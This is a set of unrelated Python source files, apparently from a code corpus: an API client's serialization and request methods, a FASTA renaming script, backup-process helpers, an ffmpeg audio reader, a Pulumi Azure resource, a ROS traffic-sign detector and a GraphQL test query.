return [self.sanitize_for_serialization(sub_obj)
for sub_obj in obj]
elif isinstance(obj, tuple):
return tuple(self.sanitize_for_serialization(sub_obj)
for sub_obj in obj)
elif isinstance(obj, (datetime, date)):
return obj.isoformat()
if isinstance(obj, dict):
obj_dict = obj
elif isinstance(obj, ModelNormal) or isinstance(obj, ModelComposed):
# Convert model obj to dict
# Convert attribute name to json key in
# model definition for request
obj_dict = model_to_dict(obj, serialize=True)
elif isinstance(obj, ModelSimple):
return self.sanitize_for_serialization(obj.value)
return {key: self.sanitize_for_serialization(val)
for key, val in six.iteritems(obj_dict)}
def deserialize(self, response, response_type, _check_type):
"""Deserializes response into an object.
:param response: RESTResponse object to be deserialized.
:param response_type: For the response, a tuple containing:
valid classes
a list containing valid classes (for list schemas)
a dict containing a tuple of valid classes as the value
Example values:
(str,)
(Pet,)
(float, none_type)
([int, none_type],)
({str: (bool, str, int, float, date, datetime, str, none_type)},)
:param _check_type: boolean, whether to check the types of the data
received from the server
:type _check_type: bool
:return: deserialized object.
"""
# handle file downloading
# save response body into a tmp file and return the instance
if response_type == (file_type,):
content_disposition = response.getheader("Content-Disposition")
return deserialize_file(response.data, self.configuration,
content_disposition=content_disposition)
# fetch data from response object
try:
received_data = json.loads(response.data)
except ValueError:
received_data = response.data
# store our data under the key of 'received_data' so users have some
# context if they are deserializing a string and the data type is wrong
deserialized_data = validate_and_convert_types(
received_data,
response_type,
['received_data'],
True,
_check_type,
configuration=self.configuration
)
return deserialized_data
def call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_type=None, auth_settings=None, async_req=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None, _host=None,
_check_type=None):
"""Makes the HTTP request (synchronous) and returns deserialized data.
To make an async_req request, set the async_req parameter.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response_type: For the response, a tuple containing:
valid classes
a list containing valid classes (for list schemas)
a dict containing a tuple of valid classes as the value
Example values:
(str,)
(Pet,)
(float, none_type)
([int, none_type],)
({str: (bool, str, int, float, date, datetime, str, none_type)},)
:param files: key -> field name, value -> a list of open file
objects for `multipart/form-data`.
:type files: dict
:param async_req bool: execute request asynchronously
:type async_req: bool, optional
        :param _return_http_data_only: response data only, without HTTP status code
and headers
:type _return_http_data_only: bool, optional
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:type collection_formats: dict, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _check_type: boolean describing if the data back from the server
should have its type checked.
:type _check_type: bool, optional
:return:
If async_req parameter is True,
the request will be called asynchronously.
The method will return the request thread.
If parameter async_req is False or missing,
then the method will return the response directly.
"""
if not async_req:
return self.__call_api(resource_path, method,
path_params, query_params, header_params,
body, post_params, files,
response_type, auth_settings,
_return_http_data_only, collection_formats,
_preload_content, _request_timeout, _host,
_check_type)
return self.pool.apply_async(self.__call_api, (resource_path,
method, path_params,
query_params,
header_params, body,
post_params, files,
response_type,
auth_settings,
_return_http_data_only,
collection_formats,
_preload_content,
_request_timeout,
_host, _check_type))
def request(self, method, url, query_params=None, headers=None,
post_params=None, body=None, _preload_content=True,
_request_timeout=None):
"""Makes the HTTP request using RESTClient."""
if method == "GET":
return self.rest_client.GET(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "HEAD":
return self.rest_client.HEAD(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "OPTIONS":
return self.rest_client.OPTIONS(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "POST":
return self.rest_client.POST(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PUT":
return self.rest_client.PUT(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PATCH":
return self.rest_client.PATCH(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "DELETE":
return self.rest_client.DELETE(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
else:
raise ApiValueError(
"http method must be `GET`, `HEAD`, `OPTIONS`,"
" `POST`, `PATCH`, `PUT` or `DELETE`."
)
def parameters_to_tuples(self, params, collection_formats):
"""Get parameters as list of tuples, formatting collections.
:param params: Parameters as dict or list of two-tuples
:param dict collection_formats: Parameter collection formats
:return: Parameters as list of tuples, collections formatted
"""
new_params = []
if collection_formats is None:
collection_formats = {}
for k, v in six.iteritems(params) if isinstance(params, dict) else params: # noqa: E501
if k in collection_formats:
collection_format = collection_formats[k]
if collection_format == 'multi':
new_params.extend((k, value) for value in v)
else:
if collection_format == 'ssv':
delimiter = ' '
elif collection_format == 'tsv':
delimiter = '\t'
elif collection_format == 'pipes':
delimiter = '|'
else: # csv is the default
delimiter = ','
new_params.append(
(k, delimiter.join(str(value) for value in v)))
else:
new_params.append((k, v))
return new_params
def files_parameters(self, files=None):
"""Builds form parameters.
:param files: None or a dict with key=param_name and
value is a list of open file objects
:return: List of tuples of form parameters with file data
"""
if files is None:
return []
params = []
for param_name, file_instances in six.iteritems(files):
if file_instances is None:
# if the file field is nullable, skip None values
continue
for file_instance in file_instances:
if file_instance is None:
# if the file field is nullable, skip None values
continue
if file_instance.closed is True:
raise ApiValueError(
"Cannot read a closed file. The passed in file_type "
"for %s must be open." % param_name
)
filename = os.path.basename(file_instance.name)
filedata = file_instance.read()
mimetype = (mimetypes.guess_type(filename)[0] or
'application/octet-stream')
params.append(
tuple([param_name, tuple([filename, filedata, mimetype])]))
file_instance.close()
return params
def select_header_accept(self, accepts):
"""Returns `Accept` based on an array of accepts provided.
:param accepts: List of headers.
:return: Accept (e.g. application/json).
"""
if not accepts:
return
accepts = [x.lower() for x in accepts]
if 'application/json' in accepts:
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
"""Returns `Content-Type` based on an array of content_types provided.
:param content_types: List of content-types.
:return: Content-Type (e.g. application/json).
"""
if not content_types:
return 'application/json'
content_types = [x.lower() for x in content_types]
if 'application/json' in content_types or '*/*' in content_types:
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings,
resource_path, method, body):
"""Updates header and query params based on authentication setting.
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_settings: Authentication setting identifiers list.
:param resource_path: A string representation of the HTTP request resource path.
:param method: A string representation of the HTTP request method.
:param body: A object representing the body of the HTTP request.
The object type is the return value of sanitize_for_serialization().
"""
if not auth_settings:
return
for auth in auth_settings:
auth_setting = self.configuration.auth_settings().get(auth)
if auth_setting:
if auth_setting['in'] == 'cookie':
headers['Cookie'] = auth_setting['value']
elif auth_setting['in'] == 'header':
if auth_setting['type'] != 'http-signature':
headers[auth_setting['key']] = auth_setting['value']
elif auth_setting['in'] == 'query':
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ApiValueError(
'Authentication token must be in `query` or `header`'
)
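# Minimal usage sketch (an assumption, not generated code): the header name and value are
# placeholders only.
#
#   config = Configuration()
#   with ApiClient(configuration=config, header_name='X-Trace', header_value='demo') as client:
#       client.set_default_header('Accept', client.select_header_accept(['application/json']))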
|
py | b40021058dac3c861f248c9ebfdc8e6913d539b4 | # %%
import os, sys
import pandas as pd
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
# %%
file_seq = sys.argv[1] #"output/16.alnta.divvy_RDRP_0.25_1081-1104.fasta"
file_list = sys.argv[2] #"original/merged-seq.acc-num.tsv"
dir = sys.argv[3] # "data/"
df_name = pd.read_csv(file_list, sep="\t", header=None)
df_name.columns = ["num", "seq_name"]
df_name["num"] = df_name["num"].astype(str)
l = []
for record in SeqIO.parse(file_seq, "fasta"):
num = record.id.split("_")[0]
pos = record.id.split("_")[1]
seq = record.seq
l.append([num, pos, seq])
df_seq = pd.DataFrame(l, columns=["num", "pos", "seq"])
df_rename = pd.merge(
df_name,
df_seq,
on="num",
how="inner"
)
# get the file name without its extension
out = dir + "/" + os.path.splitext(os.path.basename(file_seq))[0] + ".full.fasta"
l_save = []
for i in df_rename.iterrows():
seq_r = SeqRecord(i[1].seq, id = i[1].seq_name + " " + i[1].pos)
l_save.append(seq_r)
SeqIO.write(l_save, out, "fasta")
# %%
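# Usage sketch (assumed invocation; the script name is a placeholder, the paths reuse the
# examples given in the argv comments above):
#   python rename_divvy_fasta.py output/16.alnta.divvy_RDRP_0.25_1081-1104.fasta \
#       original/merged-seq.acc-num.tsv data/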
|
py | b400222a40f032f8f317c32d47f16c566ceb5d64 | # -*- coding: utf-8 -*-
from simplespamblocker.tests.middleware import (
BlockMiddlewareValidProfileTests, BlockMiddlewareEmptyProfileTests,
BlockMiddlewareWithTemplateTests)
|
py | b400225d1862e5077ec9ada2dd7b10e59acca8ec | import psutil
from rest_framework import status
from rest_framework.response import Response
notify_Error = lambda msg: Response(msg, status=status.HTTP_400_BAD_REQUEST)
def bytes2human(n):
symbols = ("KB", "MB", "GB", "TB", "PB", "E", "Z", "Y")
prefix = {}
for i, s in enumerate(symbols):
prefix[s] = 1 << (i + 1) * 10
for s in reversed(symbols):
if n >= prefix[s]:
value = float(n) / prefix[s]
return "%.1f%s" % (value, s)
return "%sB" % n
def any_backups_running():
matches = ["--server", "--partial-dir"]
for p in psutil.process_iter():
with p.oneshot():
if p.name() == "rsync":
if all(i in p.cmdline() for i in matches):
return True
return False
|
py | b40023ec6982624f9bd84f43c358274ee7a847e1 | import subprocess as sp
import re
import numpy as np
from moviepy.tools import cvsecs
from moviepy.video.io.ffmpeg_reader import ffmpeg_parse_infos
from moviepy.config import get_setting
import os
try:
from subprocess import DEVNULL # py3k
except ImportError:
DEVNULL = open(os.devnull, 'wb')
class FFMPEG_AudioReader:
"""
A class to read the audio in either video files or audio files
using ffmpeg. ffmpeg will read any audio and transform them into
raw data.
Parameters
------------
filename
Name of any video or audio file, like ``video.mp4`` or
``sound.wav`` etc.
buffersize
      The size of the buffer to use. Should be bigger than the buffer
used by ``to_audiofile``
print_infos
Print the ffmpeg infos on the file being read (for debugging)
fps
Desired frames per second in the decoded signal that will be
received from ffmpeg
nbytes
Desired number of bytes (1,2,4) in the signal that will be
received from ffmpeg
"""
def __init__(self, filename, buffersize, print_infos=False,
fps=44100, nbytes=2, nchannels=2):
self.filename = filename
self.nbytes = nbytes
self.fps = fps
self.f = 's%dle'%(8*nbytes)
self.acodec = 'pcm_s%dle'%(8*nbytes)
self.nchannels = nchannels
infos = ffmpeg_parse_infos(filename)
self.duracion = infos['duracion']
if 'video_duration' in infos:
self.duracion = infos['video_duration']
else:
self.duracion = infos['duracion']
self.infos = infos
self.proc = None
self.nframes = int(self.fps * self.duracion)
self.buffersize= min( self.nframes+1, buffersize )
self.buffer= None
self.buffer_startframe = 1
self.initialize()
self.buffer_around(1)
def initialize(self, starttime = 0):
""" Opens the file, creates the pipe. """
self.close_proc() # if any
if starttime !=0 :
offset = min(1,starttime)
i_arg = ["-ss", "%.05f"%(starttime-offset),
'-i', self.filename, '-vn',
"-ss", "%.05f"%offset]
else:
i_arg = [ '-i', self.filename, '-vn']
cmd = ([get_setting("FFMPEG_BINARY")] + i_arg +
[ '-loglevel', 'error',
'-f', self.f,
'-acodec', self.acodec,
'-ar', "%d"%self.fps,
'-ac', '%d'%self.nchannels, '-'])
popen_params = {"bufsize": self.buffersize,
"stdout": sp.PIPE,
"stderr": sp.PIPE,
"stdin": DEVNULL}
if os.name == "nt":
popen_params["creationflags"] = 0x08000000
self.proc = sp.Popen( cmd, **popen_params)
self.pos = np.round(self.fps*starttime)
def skip_chunk(self,chunksize):
s = self.proc.stdout.read(self.nchannels*chunksize*self.nbytes)
self.proc.stdout.flush()
self.pos = self.pos+chunksize
def read_chunk(self,chunksize):
L = self.nchannels*chunksize*self.nbytes
s = self.proc.stdout.read(L)
dt = {1: 'int8',2:'int16',4:'int32'}[self.nbytes]
result = np.fromstring(s, dtype=dt)
result = (1.0*result / 2**(8*self.nbytes-1)).\
                   reshape((len(result)//self.nchannels,
self.nchannels))
#self.proc.stdout.flush()
self.pos = self.pos+chunksize
return result
def seek(self,pos):
"""
Reads a frame at time t. Note for coders: getting an arbitrary
frame in the video with ffmpeg can be painfully slow if some
        decoding has to be done. This function tries to avoid fetching
arbitrary frames whenever possible, by moving between adjacent
frames.
"""
if (pos < self.pos) or (pos> (self.pos+1000000)):
t = 1.0*pos/self.fps
self.initialize(t)
elif pos > self.pos:
#print pos
self.skip_chunk(pos-self.pos)
# last case standing: pos = current pos
self.pos = pos
def close_proc(self):
if hasattr(self, 'proc') and self.proc is not None:
self.proc.terminate()
for std in [ self.proc.stdout,
self.proc.stderr]:
std.close()
del self.proc
def get_frame(self, tt):
buffersize = self.buffersize
if isinstance(tt,np.ndarray):
# lazy implementation, but should not cause problems in
# 99.99 % of the cases
# elements of t that are actually in the range of the
# audio file.
in_time = (tt>=0) & (tt < self.duracion)
# The np.round in the next line is super-important.
# Removing it results in artifacts in the noise.
frames = np.round((self.fps*tt)).astype(int)[in_time]
fr_min, fr_max = frames.min(), frames.max()
if not (0 <=
(fr_min - self.buffer_startframe)
< len(self.buffer)):
self.buffer_around(fr_min)
elif not (0 <=
(fr_max - self.buffer_startframe)
< len(self.buffer)):
self.buffer_around(fr_max)
try:
result = np.zeros((len(tt),self.nchannels))
indices = frames - self.buffer_startframe
result[in_time] = self.buffer[indices]
return result
except IndexError as error:
raise IOError("Error in file %s, "%(self.filename)+
"At time t=%.02f-%.02f seconds, "%(tt[0], tt[-1])+
"indices wanted: %d-%d, "%(indices.min(), indices.max())+
"but len(buffer)=%d\n"%(len(self.buffer))+ str(error))
else:
ind = int(self.fps*tt)
if ind<0 or ind> self.nframes: # out of time: return 0
return np.zeros(self.nchannels)
if not (0 <= (ind - self.buffer_startframe) <len(self.buffer)):
# out of the buffer: recenter the buffer
self.buffer_around(ind)
# read the frame in the buffer
return self.buffer[ind - self.buffer_startframe]
def buffer_around(self,framenumber):
"""
Fills the buffer with frames, centered on ``framenumber``
if possible
"""
        # start frame for the buffer
new_bufferstart = max(0, framenumber - self.buffersize // 2)
if (self.buffer is not None):
current_f_end = self.buffer_startframe + self.buffersize
if (new_bufferstart <
current_f_end <
new_bufferstart + self.buffersize):
# We already have one bit of what must be read
conserved = current_f_end - new_bufferstart + 1
chunksize = self.buffersize-conserved
array = self.read_chunk(chunksize)
self.buffer = np.vstack([self.buffer[-conserved:], array])
else:
self.seek(new_bufferstart)
self.buffer = self.read_chunk(self.buffersize)
else:
self.seek(new_bufferstart)
self.buffer = self.read_chunk(self.buffersize)
self.buffer_startframe = new_bufferstart
def __del__(self):
self.close_proc()
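# Minimal usage sketch (an assumption; the file name is a placeholder):
#   reader = FFMPEG_AudioReader("soundtrack.mp3", buffersize=200000)
#   first_second = reader.get_frame(np.linspace(0, 1, reader.fps))  # (fps, nchannels) array
#   reader.close_proc()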
|
py | b40023f7cfd0ceb9fa83cf715049cc6c76e0e953 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['DeploymentAtManagementGroupScope']
class DeploymentAtManagementGroupScope(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
deployment_name: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input[pulumi.InputType['DeploymentPropertiesArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Deployment information.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] deployment_name: The name of the deployment.
:param pulumi.Input[str] group_id: The management group ID.
:param pulumi.Input[str] location: The location to store the deployment data.
:param pulumi.Input[pulumi.InputType['DeploymentPropertiesArgs']] properties: The deployment properties.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Deployment tags
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['deployment_name'] = deployment_name
if group_id is None and not opts.urn:
raise TypeError("Missing required property 'group_id'")
__props__['group_id'] = group_id
__props__['location'] = location
if properties is None and not opts.urn:
raise TypeError("Missing required property 'properties'")
__props__['properties'] = properties
__props__['tags'] = tags
__props__['name'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:resources/v20200801:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/latest:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/latest:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/v20190501:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190501:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/v20190510:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190510:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/v20190701:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190701:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/v20190801:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190801:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/v20191001:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/v20191001:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/v20200601:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/v20200601:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-native:resources/v20201001:DeploymentAtManagementGroupScope"), pulumi.Alias(type_="azure-nextgen:resources/v20201001:DeploymentAtManagementGroupScope")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(DeploymentAtManagementGroupScope, __self__).__init__(
'azure-native:resources/v20200801:DeploymentAtManagementGroupScope',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'DeploymentAtManagementGroupScope':
"""
Get an existing DeploymentAtManagementGroupScope resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["location"] = None
__props__["name"] = None
__props__["properties"] = None
__props__["tags"] = None
__props__["type"] = None
return DeploymentAtManagementGroupScope(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
the location of the deployment.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the deployment.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> pulumi.Output['outputs.DeploymentPropertiesExtendedResponse']:
"""
Deployment properties.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Deployment tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the deployment.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
py | b40024004d7aecaa9fb1e3e843ca88ea92ea2c20 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import cv2
import math
import tensorflow as tf
import rospy
from sensor_msgs.msg import CompressedImage
from sensor_msgs.msg import Image
from std_msgs.msg import String
from cv_bridge import CvBridge, CvBridgeError
def fully_connected_neural_network(X, keep_prob):
W1 = tf.get_variable("W1", shape=[784, 512], initializer=tf.contrib.layers.xavier_initializer())
b1 = tf.Variable(tf.random_normal([512]))
L1 = tf.nn.relu(tf.matmul(X, W1) + b1)
L1 = tf.nn.dropout(L1, keep_prob=keep_prob)
W2 = tf.get_variable("W2", shape=[512, 512], initializer=tf.contrib.layers.xavier_initializer())
b2 = tf.Variable(tf.random_normal([512]))
L2 = tf.nn.relu(tf.matmul(L1, W2) + b2)
L2 = tf.nn.dropout(L2, keep_prob=keep_prob)
W3 = tf.get_variable("W3", shape=[512, 512], initializer=tf.contrib.layers.xavier_initializer())
b3 = tf.Variable(tf.random_normal([512]))
L3 = tf.nn.relu(tf.matmul(L2, W3) + b3)
L3 = tf.nn.dropout(L3, keep_prob=keep_prob)
W4 = tf.get_variable("W4", shape=[512, 512], initializer=tf.contrib.layers.xavier_initializer())
b4 = tf.Variable(tf.random_normal([512]))
L4 = tf.nn.relu(tf.matmul(L3, W4) + b4)
L4 = tf.nn.dropout(L4, keep_prob=keep_prob)
W5 = tf.get_variable("W5", shape=[512, 10], initializer=tf.contrib.layers.xavier_initializer())
b5 = tf.Variable(tf.random_normal([10]))
hypothesis = tf.nn.softmax(tf.matmul(L4, W5) + b5)
return hypothesis
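# Note: the network above assumes a flattened 28x28 (=784) grayscale image as input and
# returns softmax scores over 10 classes; its weights are restored from the checkpoint
# loaded in TrafficSignDetection.__init__ below.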
def center(points):
center_x = (points[0][0][0] + points[1][0][0] + points[2][0][0] + points[3][0][0])/4.0
center_y = (points[0][0][1] + points[1][0][1] + points[2][0][1] + points[3][0][1])/4.0
return center_x, center_y
def find_position(points):
center_x, center_y = center(points)
index = np.zeros(4)
existance0 = 'no'
existance1 = 'no'
existance2 = 'no'
existance3 = 'no'
existanceall = 'no'
for i in range(4):
if points[i][0][0] < center_x:
if points[i][0][1] > center_y:
index[3] = i
existance3 = 'yes'
else:
index[0] = i
existance0 = 'yes'
else:
if points[i][0][1] > center_y:
index[2] = i
existance2 = 'yes'
else:
index[1] = i
existance1 = 'yes'
if existance0 == 'yes' and existance1 == 'yes' and existance2 == 'yes' and existance3 == 'yes':
existanceall = 'yes'
return existanceall, index
def find_angle(point1, point0, point2):
y1 = point1[1] - point0[1]
y2 = point2[1] - point0[1]
x1 = point1[0] - point0[0]
x2 = point2[0] - point0[0]
angle = math.atan2(y1*x2 - x1*y2, x1*x2+y1*y2)*180/np.pi
return abs(angle)
def distinguish_rectangular(screenCnt):
threshold_angle = 20
existance, index = find_position(screenCnt)
for i in range(4):
if find_angle(screenCnt[(i+0)%4][0], screenCnt[(i+1)%4][0], screenCnt[(i+2)%4][0]) > 90 + threshold_angle or find_angle(screenCnt[(i+0)%4][0], screenCnt[(i+1)%4][0], screenCnt[(i+2)%4][0]) < 90 - threshold_angle:
satisfaction_angle = 'no'
break
        satisfaction_angle = 'yes'
    if satisfaction_angle == 'yes' and existance == 'yes':
        return 'yes'
    return 'no'
class TrafficSignDetection():
def __init__(self):
self.X = tf.placeholder(tf.float32, [None, 784])
self.keep_prob = tf.placeholder("float")
self.Y = fully_connected_neural_network(self.X, self.keep_prob)
self.sess = tf.InteractiveSession()
init_op = tf.global_variables_initializer()
self.sess.run(init_op)
self.saver = tf.train.Saver()
self.saver.restore(self.sess, "/home/kihoon/catkin_ws/src/self_driving_turtlebot3/src/signal_sign_detection/model/model.ckpt")
self.selecting_sub_image = "raw" # you can choose image type "compressed", "raw"
# subscribers
if self.selecting_sub_image == "compressed":
self._sub = rospy.Subscriber('/image_calibrated_compressed', CompressedImage, self.callback, queue_size=1)
else:
self._sub = rospy.Subscriber('/image_calibrated', Image, self.callback, queue_size=1)
# publishers
self._pub = rospy.Publisher('/signal_sign', String, queue_size=1)
self._cv_bridge = CvBridge()
self.softmax_threshold = 0.9
def callback(self, image_msg):
if self.selecting_sub_image == "compressed":
np_arr = np.fromstring(image_msg.data, np.uint8)
image = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)
else:
image = self._cv_bridge.imgmsg_to_cv2(image_msg, "bgr8")
# save original image
image_origin = np.copy(image)
# converting to gray
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# adding blur
image_smoothing = cv2.bilateralFilter(image_gray, 5, 5, 5)
        # finding edges
image_edged = cv2.Canny(image_smoothing, 20, 100)
        # making the edges thicker
kernel = np.ones((5,5),np.uint8)
image_dilation = cv2.dilate(image_edged,kernel,iterations = 1)
        # finding contours
_, cnts, hierarchy = cv2.findContours(image_dilation.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:10]
screenCnt = None
area_pre = 100000
for c in cnts:
peri = cv2.arcLength(c, True)
approx = cv2.approxPolyDP(c, 0.02 * peri, True)
            # process this contour only if it has 4 vertices
if len(approx) == 4:
screenCnt = approx
area_now = cv2.contourArea(c)
check_rectangular = distinguish_rectangular(screenCnt)
                # proceed only if all corner angles of the quadrilateral are between 70 and 110 degrees
if check_rectangular == 'yes' and area_pre - area_now < 10000:
cv2.drawContours(image, [screenCnt], -1, (0, 255, 0), 3) # drawing rectangular box
for j in range(4): # drawing circles in vertex
image = cv2.circle(image, (screenCnt[j][0][0], screenCnt[j][0][1]), 2, (0, 0, 255), thickness=3, lineType=8, shift=0)
_, index = find_position(screenCnt)
self.object_recognition(screenCnt[int(index[0])][0], screenCnt[int(index[1])][0], screenCnt[int(index[2])][0], screenCnt[int(index[3])][0], image_origin)
area_pre = area_now
screenCnt_pre = screenCnt
# showing images
cv2.imshow("image_edged", image_edged), cv2.waitKey(1)
cv2.imshow("image_dilation", image_dilation), cv2.waitKey(1)
cv2.imshow("image", image), cv2.waitKey(1)
def object_recognition(self, point1, point2, point3, point4, image_origin):
pts_src = np.array([point1, point2, point3, point4])
# Homography processing to make flat image
pts_dst = np.array([[0, 0], [149, 0], [149, 149], [0, 149]])
h, status = cv2.findHomography(pts_src, pts_dst)
cv_Homography = cv2.warpPerspective(image_origin, h, (150, 150))
# showing flat image
cv2.imshow("cv_Homography", cv_Homography), cv2.waitKey(1)
        # resize and convert to a numpy array to feed the neural network
image_resize = cv2.resize(cv_Homography, (28, 28))
image_gray = cv2.cvtColor(image_resize, cv2.COLOR_BGR2GRAY)
image_reshape = np.reshape(image_gray, (1, 784))
# predicting image label using neural network
prediction = self.sess.run(self.Y, feed_dict={self.X: image_reshape, self.keep_prob: 1.0})
index = np.argmax(prediction, 1)[0]
# publishing topic
sign = ['RIGHT', 'LEFT', 'TOP', 'BOTTOM', 'UNDER20', 'UNDER50', 'STOP', 'WARNING']
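        # Note: the network above has 10 outputs while only 8 labels are
        # listed here, so an argmax of 8 or 9 would raise an IndexError.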
if prediction[0][index] > self.softmax_threshold:
            print(prediction[0][index])
message = sign[index]
self._pub.publish(message)
def main(self):
rospy.spin()
if __name__ == '__main__':
    rospy.init_node('signal_sign_detection')
    traffic_sign_detection = TrafficSignDetection()
    traffic_sign_detection.main()
|
py | b400242e3ce21e52232c150f49c3a2edbdba5da7 | from setuptools import setup, find_packages
from scheduler_failover_controller import __version__
setup(
name='scheduler_failover_controller',
description='A process that runs in unison with Apache Airflow to control the Scheduler process to ensure High Availability',
version=__version__,
packages=find_packages(),
include_package_data=True,
zip_safe=False,
scripts=['scheduler_failover_controller/bin/scheduler_failover_controller'],
install_requires=[
'apache-airflow>=1.9.0',
'kazoo>=2.2.1',
'coverage>=4.2',
'eventlet>=0.9.7',
],
extras_require={},
author='Robert Sanders',
author_email='[email protected]',
url='https://github.com/teampayoff/airflow-scheduler-failover-controller',
download_url=('https://github.com/teampayoff/airflow-scheduler-failover-controller/tarball/' + __version__)
)
|
py | b400245c06e29f178a177787537158c658f67e90 | import graphene
import pytest
from ....tests.utils import get_graphql_content
SHIPPING_METHODS_QUERY = """
query GetShippingMethods($channel: String) {
shippingZones(first: 10, channel: $channel) {
edges {
node {
shippingMethods {
id
name
minimumOrderWeight {
unit
value
}
maximumOrderWeight {
unit
value
}
type
channelListings {
id
channel {
id
name
}
}
price {
amount
currency
}
maximumOrderPrice {
currency
amount
}
minimumOrderPrice {
currency
amount
}
}
}
}
}
}
"""
